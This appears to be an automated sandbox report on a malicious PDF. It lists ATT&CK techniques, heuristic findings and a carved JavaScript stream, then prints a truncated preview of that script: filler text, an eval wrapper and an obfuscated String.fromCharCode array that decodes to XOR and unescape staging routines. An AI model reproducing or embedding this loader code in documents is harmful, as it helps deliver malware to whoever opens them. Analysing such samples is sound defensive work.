Verdict: MALICIOUS
Risk Score: 116
Malware Insights
MITRE ATT&CK
- T1059.007 JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript, flagged by multiple heuristics as a potential exploit. The JavaScript stream, though heavily obfuscated, uses String.fromCharCode and eval, indicating it's designed to execute arbitrary code. This strongly suggests the PDF is a dropper or exploit document intended to download and execute a secondary malicious payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics (4)
- JavaScript action (severity: low, 2 related findings) [PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (severity: critical) [PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (severity: low) [PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (severity: info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0007_000.js (hash: d2bda71aaecd1a24047aae90bc6f2eacbda7a486ac100747d158f42c59d621fa) | pdf-javascript-stream | PDF /JS object 7 at offset 0x420 | 143363 bytes |
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script: first 1,000 lines of the extracted script
Yrtavy3 = 'Reagan icon time piles trade teddy props hump throws pecan gggg. This isalign aged nh mint. According as after behind over under.<br> Through answered the this isalign aged nh mint busy foam new gain. Nh mint busy foam new gain pecan gggg.<br> Gggg hem here whine ez rome reagan icon time. Out through answered the this. For on into to without upon up according. Hem here whine ez rome reagan icon time piles. Icon time piles trade teddy props hump throws mint busy foam.<br> Hump throws on into to without upon up according as after. Nh mint busy foam new gain pecan gggg hem here. Rome reagan icon time piles trade teddy props hump. Aged nh mint busy foam new gain pecan gggg hem here. Props hump throws ez rome reagan icon time piles trade teddy. Isalign aged nh mint busy. Gain pecan gggg hem here whine. By at from of out through answered the this. Pecan gggg hem here whine ez rome reagan icon. Aged nh mint busy foam new gain pecan gggg. Hump throws throws teddy props hump throws. Busy foam new gain pecan gggg. Up according as after behind over. Aged nh mint busy foam new gain. Into to without upon up according as after behind over. New gain pecan gggg hem here whine ez rome reagan icon time. Throws at from of out through. Teddy props hump throws pecan gggg hem here whine.<br> In for on into to without upon up according as after. Over under by at from.<br> Hump throws after behind over under by.<br> Pecan gggg hem here whine ez rome reagan. Busy foam new gain pecan. Through answered the this isalign aged nh mint busy foam. ';
function Tpsnif5(Apkh99){
if (app) {
eval(Apkh99);
}
}
if (app) Yrtavy3 = '';
Tpsnif5(eval(' String.fromCharCode(102 ,117 ,110 ,99 ,116/*Mxts9oplc85g82vt3ev */,105 ,111 ,110/*M0c66w0zt4slcze0lvj1 */,32/*Q7gj219ppagil */,68/*Aptfrzyypkjfw1pgw81kom */,119 ,122 ,107 ,116 ,109 ,99/*Wjqj7ggwmucraox04ktzdt5 */,55 ,40 ,84 ,107 ,116 ,114 ,122 ,108 ,53 ,41 ,123 ,118 ,97 ,114 ,32/*Wcgnl42dfprhu7a6y */,67/*T8ywm86gi76wh91sl */,103 ,113 ,57/*V3t5tm1ksk9z71 */,104/*Fifge0yykr7buk7 */,106 ,49 ,50 ,117 ,61 ,48/*V5d7j9pezrozrlx */,59 ,118 ,97 ,114 ,32 ,83 ,107 ,117/*If653ij2bi97fk9dnn */,56 ,118 ,105 ,61/*Fwf9l8otk25v7oy */,34 ,34 ,59 ,10/*Kc3rws2ukzp3y7 */,32 ,32 ,102 ,111 ,114 ,32/*A7mh32od14thbsxio4 */,40 ,67 ,103 ,113 ,57 ,104 ,106 ,49/*Yrwq6nf0dvpezsfx8w */,50 ,117 ,32 ,61 ,32 ,48 ,59/*Mzyjg6wdsjgkrushyds */,67 ,103 ,113 ,57 ,104 ,106 ,49 ,50 ,117 ,32 ,60 ,84 ,107 ,116/*Yxwsgdlr6osjwyu0t7jpnvm */,114 ,122 ,108/*Q3rsbncnvj2tlxua2i */,53 ,46 ,108 ,101 ,110 ,103 ,116/*Snk0sd6yo6adkv */,104 ,59 ,67 ,103 ,113/*Eid1xkah9pl4o8q0n */,57 ,104 ,106/*Qp9ph6zwq35d9wee2 */,49 ,50 ,117 ,43 ,43 ,41 ,123 ,10 ,32 ,32 ,32/*Pnzchlbbjlyfqpza534 */,83 ,107 ,117 ,56 ,118 ,105 ,32 ,61 ,32 ,83/*K80ppe6jq3dc5s1972pe */,107 ,117 ,56 ,118/*Cfoocxulvzvqd20rfj */,105 ,43 ,83 ,116 ,114 ,105 ,110 ,103 ,46 ,102 ,114 ,111 ,109/*Luhgbo9penzcjibmntr */,67 ,104 ,97 ,114 ,67 ,111 ,100 ,101 ,40 ,84 ,107 ,116 ,114 ,122/*Tu4njdo9o3hmz3s1hh */,108/*Kij6ylv5wfnzm94 */,53 ,46 ,99 ,104 ,97 ,114/*Kwmwuod6isid7i */,67 ,111 ,100 ,101 ,65 ,116 ,40 ,67/*Ox47s1b30fccvbak4 */,103 ,113 ,57 ,104 ,106 ,49/*Heb43kypf9zc9vfwcd0 */,50 ,117 ,41 ,94 ,49 ,41 ,59 ,10/*Jgytyj134keexkj */,32 ,32 ,125 ,10 ,32 ,32 ,114 ,101 ,116 ,117/*Wwy2zapqlt7i4ig36r */,114 ,110 ,32 ,83 ,107/*Iq4kcp8f58llpc89 */,117 ,56/*Gx3uwq3n1pq8pdm6 */,118 ,105/*H29yb6ji99ojh037 */,59 ,10 ,125 ,10 ,102 ,117 ,110/*Wbtjd14k0r1ei3c3b4 */,99 ,116 ,105 ,111 ,110 ,32 ,84 ,54/*G5b75pnk933a7fywfri */,52 ,50 ,50 ,98 ,116/*Ucrinwkikvl1piclz */,109/*Asujo1qhjfnaa71y */,98 ,40 ,80 ,51/*Hatldeisgvi0qtda */,48 ,50 ,55 ,55 ,121 ,57/*B9xnfnj2w6lakco0pug 
*/,41 ,123 ,10 ,32 ,32 ,32 ,114/*Rybm9d1qd61fxp2c */,101 ,116 ,117 ,114/*Dae0t1yaeprqkei0uc8v */,110 ,32 ,117 ,110/*Ga4ivrez60hd5fv */,101 ,115 ,99 ,97 ,112 ,101 ,40 ,80 ,51 ,48 ,50/*M7164pxnpg3a1aam6jv */,55 ,55/*Luwtzekqeyu0t2xd323 */,121 ,57 ,41 ,59 ,10 ,125 ,10/*Flh5f5dgi83il4w */,10/*Ifeanw1mdesnpktf */,10 ,118 ,97 ,114 ,32 ,73 ,106
... (truncated)